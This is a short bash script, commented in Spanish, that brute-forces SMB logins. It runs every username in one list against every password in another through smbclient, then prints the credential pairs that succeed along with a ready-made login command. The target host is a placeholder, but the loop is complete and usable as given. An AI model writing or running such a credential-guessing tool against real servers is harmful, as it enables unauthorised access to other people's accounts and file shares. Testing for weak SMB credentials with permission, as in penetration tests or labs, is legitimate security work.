#!/bin/bash
for user in $(cat usrlist); 
    do
        for pass in $(cat pwdlist); 
            do
		ip="ip"
		OUTPUT=$(smbclient -L //$ip/ -U $user"%"$pass)
		echo "[*] Intentando credenciales: '"$user"' '"$pass"'"
		if echo "${OUTPUT}" | grep 'failed:'; then
  			echo ""
		else
			echo "[+] Usuario accedido con exito: "$user" / "$pass
			echo "[+] Ejecutar el siguiente comando para hacer login: smbclient -L //"$ip"/ -U "$user"%"$pass
			echo "${OUTPUT}\n"
		fi
            done ;
    done
